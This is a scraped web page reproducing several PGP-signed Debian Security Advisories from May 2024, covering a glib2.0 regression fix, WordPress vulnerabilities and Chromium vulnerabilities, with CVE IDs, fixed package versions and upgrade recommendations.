x4Ya6++JrJ1994U5esZB7VC0ucEUOc0SqwARyHv6NMmkKxxIPv2YdqPFE196x2Ns  
1rTM6dMriuCaKLOb2WUtOawLKPnBNQ0dRS1JLcNDA1Dy9zbDDB6ev8idKnixRMbv  
EOyZjBm8RTBK7dGw0BlTdHAoCZvczQJvinAJptvL+771qwcwq7SaL+6L1Ht1MGcN  
WS+wrb+DzpSvfprtv5Qvs0NEpmGISwbK3T/XOEnyyKMQdhemNtpvjWvF+0WNBf/d  
3nPAa5F9ZxJJMEuJFjAmm/HiK3R6Uko899yBtNbDkJbbA+vQlM8=MdSz  
-----END PGP SIGNATURE-----

Debian Security Advisory 5684-1

Debian Linux Security Advisory 5682-2 - The update for glib2.0 released as DSA 5682-1 caused a regression in ibus affecting text entry with non-trivial input methods. Updated glib2.0 packages are available to correct this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5682-2                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 09, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : glib2.0  
Debian Bug     : 1070730 1070736 1070743 1070745 1070749 1070752

The update for glib2.0 released as DSA 5682-1 caused a regression in  
ibus affecting text entry with non-trivial input methods. Updated  
glib2.0 packages are available to correct this issue.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.66.8-1+deb11u3.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.74.6-2+deb12u2.

We recommend that you upgrade your glib2.0 packages.

For the detailed security status of glib2.0 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/glib2.0

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmY8V7JfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RJGA/+IOsDXWcvXMOYEueKNZ+pIFVXLbT4GVMBvUIBf0wqJFbnmwaTXaEojqNR  
HKFcCLIBKzhHkJvCmhaEsaZXj05GxI0jIKV0CULuEl1PeYpXaypIF0BIbtH7Jd0j  
Q7/3qQgafewuJgqwn7e3CG9mF8oZv/QfwH4VPaJMkMd7cdRNytKOiJosg2ZEl3FK  
ycO/t58SMPxApzY5eebAU/u37UKAzI7PeCIz9FaCUQdwMUFuUeJvsYD21PwxYN/R  
LK79UsnHiw6sr3cpNirOhm7F3HXSh7WFBqQdcLGrTaix3X+RKW7NymNhIW8m7qWg  
kJ7w6JArMuvxj2Y2RiBF0eqVVkYcTHOe964+nvDHjzFIUkLU0yhw2GLhK4GzbWjl  
VpXc/+Rv1I9OsFF4SiKNSbi728NM4GUS3ziew//1l9EPM281UrCDoFRkwi1FP2jT  
KVWB0CZacqLmo62cT49HBb1rSxDXSEi0qc0yMKus+Jk+NT8H1k+cpjrK5hy0flJt  
JJWTOJMJ2Ph7LvLbrfsVoeuxeIz+taoLz6JW5dkpk1/LkxSmZkIKztdolirONMqF  
vBCTyz7IvBxqro5+vRsBnSFPJdw4pCVxhfgI/BFIUe8dA2Sh8bE+o69wTgcGDst5  
ZHf28D3hClhMSc/SgotNTUf8KycA15VjxhvNtAeFL0HpOvAKiKI=T+EA  
-----END PGP SIGNATURE-----

Debian Security Advisory 5682-2

Debian Linux Security Advisory 5685-1 - Several security vulnerabilities have been discovered in Wordpress, a popular content management framework, which may lead to exposure of sensitive information to an unauthorized actor in WordPress or allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5685-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
May 08, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : wordpress  
CVE ID         : CVE-2023-2745 CVE-2023-5561 CVE-2023-38000 CVE-2023-39999  
                 CVE-2024-31210  
Debian Bug     : 1036296

Several security vulnerabilities have been discovered in Wordpress, a popular  
content management framework, which may lead to exposure of sensitive  
information to an unauthorized actor in WordPress or allowing unauthenticated  
attackers to discern the email addresses of users who have published public  
posts on an affected website via an Oracle style attack.

Furthermore this update resolves a possible cross-site-scripting vulnerability,  
a PHP File Upload bypass via the plugin installer and a possible remote code  
execution vulnerability which requires an attacker to control all the  
properties of a deserialized object though.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.7.11+dfsg1-0+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.6+dfsg1-0+deb12u1.

We recommend that you upgrade your wordpress packages.

For the detailed security status of wordpress please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/wordpress

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmY78XJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRBIBAAlHttuzHU3awlLA5WFHprj6S3PJA2YQSQjt+Ejk+pFGVpHjs4/gaI8S/t  
3rb9hEf2ClK6NdNxqAHSNzOuYLAG3S1rfATtQGfxEpYTBrngXKSUgFltElhRBACe  
GOLxtfh7Yha94hbf/HBiFEpKEmFXLnmGuSv1M0z77SEcNEdQ0sd5Be5VDwKcxnY6  
FYrrvoFjYUiDj66B19/B8ytUlRb7Mgr8KakqOiO6jzINL/mtJ52pcd63+JrkBF0L  
8br30YKxII9Rb10ygBhl5AzjhC/yrQexVtYyK0l1avm7/JC08kxDch++ANRekCJA  
kTx0ARi2AZJv1ktzm1DIfxNLrLtiCTJjSFFi6/WTCW3UAFNiVbEQOYal95lKBLXG  
V6AJhYYYPI3rbwnUJX5FZn4PEKoHTXotuveqdGHF2727ROUrConLZrrBa/hovj7v  
GPIe4SZZHLizK2CO84Gxgy7mI4F46I2C6TlIMvsJKyL1XUopti+Ds8f7e5AIgzB9  
rSkYPTBfLsm5fIeVpodja1qJMQdo9NklnamaPnbjL8BTmExedf638WYJfMLBqgXY  
Kl9M6uSwfBpl2dfvKqg2iUos359X65Nt+Cd3Ve5zsSigDssvsQ7YTV/TJHMavq6z  
f294k2zHfMaCiathCpOayN8KFX7WHeBEL8N8j/bukYgFaHD8y5o=qCem  
-----END PGP SIGNATURE-----

Debian Security Advisory 5685-1

Debian Linux Security Advisory 5683-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5683-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonMay 08, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-4558 CVE-2024-4559Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 124.0.6367.155-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmY7uGgACgkQZF0CR8Nudjd22Q//dbbbPSmdO9POoo84j9bYe8zylzsajP6m9eCkZhWlLrH/Rd81mjO8azs75F32yeGdbx17T3hG0MHsPxVpCaIj2DUvjd+r0k1voeYmovGdNIqt6rKZeQNVfFymf7EuOMcq271nIZ5VHFfDKis5p5s4SXyt4+8sOIWf39IzoEdm8tnNJU+7ALsEkvQXdFIf3mVtOgKQSgtzeNV6qz4Pp9w8t9aK4zjOZTBcYaZDbhUfjiNKWh7oiTlmAkregOhUdwG3PgztwbAVWPzjOmaWnWaZCTZ4haO9zWY4B8h6ULdAjVmR0wDy9R3RL4XGHp8Jvj6i5n19cMjGk/tQtDOVIUaPLF6F3/o4E5AB6r6daAiZIDWePcb4VuLXEMTnkZWaZ39P718aSykCX1A9g4ka8py3nFOEE7J+4ktgx8h3Hk3yVxl6VWMhVfJ8bRwrlvlNzU4FRqxsxlNylNKDcw98juPqQ0U7lWv+U1QXWhzkFCiM18uv7pdGCUlCqXBlQFJ4bWDtdgPn71OSE9m6oIKSWD1wisuig1tIPF4ZxeE+jhTMS3t/yEZk1FgPKixhFs9xuuv/CaXEe5sJP2vD8aFp7kdpV0HnuJDb2rqCfxjegKQY43IsMlUH8Q02wXVP00Aq/1A/8YHBcT9uBaAltuBMZY7tn1xL5eHijwYxhCA9dEB7mEo=L3HH-----END PGP SIGNATURE-----

Tag

#linux